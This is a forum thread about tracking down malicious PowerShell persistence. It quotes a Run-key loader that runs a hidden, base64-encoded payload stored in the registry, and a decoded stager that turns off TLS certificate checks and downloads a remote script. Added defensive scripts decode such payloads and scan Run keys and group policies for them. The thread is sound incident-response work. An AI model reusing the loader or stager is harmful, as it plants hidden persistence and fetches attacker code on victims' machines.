Suspicious PowerShell Activity

  • Question

  • Hello,

    We've found a PowerShell process that recently has started launching when a user logs in, and it appears to be communicating with an outside IP address, not associated with our company at all. I haven't been able to find the source for this besides two entries in the registry that keep reappearing.

    The registry keys are as follows:

    In HKLM/Software/Microsoft/Windows/CurrentVersion/Run:

    PowerShellAD - "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -c "$x=$((gp HKLM:Software\Microsoft\Windows\CurrentVersion ComputerID).ComputerID);powershell -Win Hidden -enc $x"

    In HKLM/Software/Microsoft/Windows/CurrentVersion:


    Below is a screenshot of the processes that start when logging in:

    [Screenshot: PowerShell processes]

    For the time being, we've put in place a rule to prevent PowerShell from running, but we need help finding the source of this and removing it.

    So far, virus scans and root-kit scans are not finding anything, but we're also preventing this from running so it may not find anything.

    Any help would be appreciated.

    Thank you,


    Monday 25 July 2016 15:03

All replies

  • After decoding and decompressing the encoded string, one gets to a command which downloads a further script:

    [System.Net.ServicePointManager]::ServerCertificateValidationCallback = { $true }
    (New-Object Net.WebClient).DownloadString('')

    The resulting script seems to be based on PowerSploit.

    Monday 25 July 2016 19:53
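The loader in the question reads its payload from the `ComputerID` value and hands it to `powershell -enc`, and the reply above describes decoding and decompressing that blob to reach the download command. The following script is an added example written for this thread, not code posted by anyone here: it enumerates Run entries that launch PowerShell with an encoded or hidden command, decodes the `ComputerID` payload, tries to unwrap a gzip or deflate inner layer (an assumption about the compression used; the thread does not say), and extracts the indicators an analyst wants first. It never executes anything it decodes.

```powershell
# Added example for this thread (not code from any poster): read-only triage of
# the persistence described above. Run in an elevated PowerShell on the
# affected host. Nothing decoded is executed.

$runKeys = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run'
)
$providerMeta = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'

function Get-SuspiciousRunEntry {
    foreach ($key in $runKeys) {
        if (-not (Test-Path $key)) { continue }
        $item = Get-ItemProperty -Path $key
        foreach ($prop in $item.PSObject.Properties) {
            if ($providerMeta -contains $prop.Name) { continue }
            $cmd = [string]$prop.Value
            # powershell.exe accepts any unambiguous prefix of -EncodedCommand;
            # the alternatives below cover the common spellings.
            if ($cmd -match 'powershell' -and
                $cmd -match '\s-(e|ec|enc|encodedcommand)\b|\s-win(dowstyle)?\s+hidden') {
                [pscustomobject]@{ Key = $key; Name = $prop.Name; Command = $cmd }
            }
        }
    }
}

function ConvertFrom-EncodedCommand {
    param([Parameter(Mandatory)][string]$Base64)
    # -EncodedCommand carries UTF-16LE script text, base64 encoded.
    [Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Base64))
}

function Expand-CompressedPayload {
    # Assumption: the inner blob is base64 of a gzip or deflate stream. Try
    # both and return the first that yields text, or $null.
    param([Parameter(Mandatory)][string]$Base64)
    $bytes = [Convert]::FromBase64String($Base64)
    foreach ($type in 'System.IO.Compression.GzipStream', 'System.IO.Compression.DeflateStream') {
        try {
            $ms     = New-Object IO.MemoryStream -ArgumentList (,$bytes)
            $stream = New-Object -TypeName $type -ArgumentList $ms, ([IO.Compression.CompressionMode]::Decompress)
            $reader = New-Object IO.StreamReader -ArgumentList $stream
            $text   = $reader.ReadToEnd()
            if ($text) { return $text }
        } catch { }
    }
    return $null
}

function Get-PayloadIndicator {
    # Pull out the network and evasion artefacts worth escalating on.
    param([Parameter(Mandatory)][string]$Script)
    $patterns = @{
        Url       = 'https?://[^\s''"\)]+'
        IPv4      = '\b(\d{1,3}\.){3}\d{1,3}\b'
        Download  = 'DownloadString|DownloadFile|Invoke-WebRequest|WebClient'
        TlsBypass = 'ServerCertificateValidationCallback'
        Eval      = '\bIEX\b|Invoke-Expression'
    }
    foreach ($name in $patterns.Keys) {
        foreach ($m in [regex]::Matches($Script, $patterns[$name], 'IgnoreCase')) {
            [pscustomobject]@{ Indicator = $name; Value = $m.Value }
        }
    }
}

Get-SuspiciousRunEntry | Format-List

# The loader in the question reads its payload from this value.
$stageKey = 'HKLM:\Software\Microsoft\Windows\CurrentVersion'
$encoded  = (Get-ItemProperty -Path $stageKey -ErrorAction SilentlyContinue).ComputerID
if ($encoded) {
    $stage1 = ConvertFrom-EncodedCommand $encoded
    "=== Stage 1 (decoded ComputerID payload) ===`n$stage1"
    $inner = [regex]::Match($stage1, 'FromBase64String\(\s*[''"]([A-Za-z0-9+/=]{40,})[''"]\s*\)')
    if ($inner.Success) {
        $stage2 = Expand-CompressedPayload $inner.Groups[1].Value
        if ($stage2) { "=== Stage 2 (decompressed) ===`n$stage2" }
    }
    $final = if ($stage2) { $stage2 } else { $stage1 }
    Get-PayloadIndicator $final | Sort-Object Indicator, Value -Unique | Format-Table -AutoSize
}
```

The decoded stages and the URL or IP they contact are what to hand to the network team and to compare against the outbound connection already seen; because the entries reappear, the output is evidence for locating what rewrites them, not a cleanup step on its own.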
  • OK. That makes sense since the initial tasks that are started have the web address string in the command line within Task Manager.

    Any idea where this may be downloading the scripts, or where I need to search next for possible infection?



    Monday 25 July 2016 19:57
  • What do you mean, "where this may be downloading the scripts"?
    It is run via the registry key you found, which you should delete.
    It is downloading from the IP address.
    The original vector/dropper might have been via browser or email.

    I myself would nuke it from orbit (= reinstall Windows), but you could contact someone at

    Monday 25 July 2016 20:58
  • Unfortunately, when I delete this reg key from my PC, it gets reapplied within a few hours. I need to find the source PC first before I nuke anything.

    I'll post at to see if they can help with how to track down the source (and hopefully prevent more!)

    Thanks for the help.


    Tuesday 26 July 2016 11:21
  • We are looking forward to your good news :)

    Please mark the reply as an answer if you find it is helpful.

    If you have feedback for TechNet Support, contact

    Wednesday 27 July 2016 09:44
  • So the mystery is somewhat solved. I traced it down to a PowerShell command that was placed in our default domain group policy. I removed this entry and it seems to be slowly removing itself from the network.

    The next thing to figure out now is where this came from. There are only three people at our company with the domain password and none of us put that there.

    The task that was running in the group policy said it was created by domain\administrator, so we are a bit perplexed over this one. Any ideas on how to trace this part of it?




    Friday 5 August 2016 19:53
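The last post found the persistence in a domain group policy and asks how to trace who put it there. As an added example, not code from anyone in the thread, the script below sweeps every GPO in the current domain for scheduled tasks, scripts or preference items that launch PowerShell with an encoded or hidden command, and reports the GPO's owner and creation/modification times, which is the first thing to check against the three known password holders. It assumes the GroupPolicy RSAT module is installed and the account can read all GPOs; it changes nothing.

```powershell
# Added example for this thread (not code from any poster): find which GPOs
# carry an encoded/hidden PowerShell launch and when they last changed.
# Requires the GroupPolicy module (RSAT); read-only.
Import-Module GroupPolicy

function Find-EncodedPowerShellInGpo {
    # Matches "powershell[.exe] ... -enc" or "... -Win Hidden" inside the XML
    # report, where the command line appears as escaped text.
    $pattern = '(?i)powershell(\.exe)?[^<>]{0,400}?\s-((e|ec|enc|encodedcommand)\b|win(dowstyle)?\s+hidden)'
    foreach ($gpo in Get-GPO -All) {
        $xml = Get-GPOReport -Guid $gpo.Id -ReportType Xml
        foreach ($m in [regex]::Matches($xml, $pattern)) {
            [pscustomobject]@{
                GPO      = $gpo.DisplayName
                Id       = $gpo.Id
                Owner    = $gpo.Owner
                Created  = $gpo.CreationTime
                Modified = $gpo.ModificationTime
                Evidence = $m.Value
            }
        }
    }
}

Find-EncodedPowerShellInGpo | Format-List
```

The `Modified` timestamp narrows the window to search; if Directory Service Changes auditing is enabled on the domain controllers, event 5136 in the Security log for the matching `groupPolicyContainer` object records which account made the edit, and the NTFS timestamps under the SYSVOL `Policies\{GUID}` folder give the same window from the file side. An entry "created by domain\administrator" with no administrator having made it points at a stolen or reused credential rather than an insider, which is why the source machine matters more than the GPO itself.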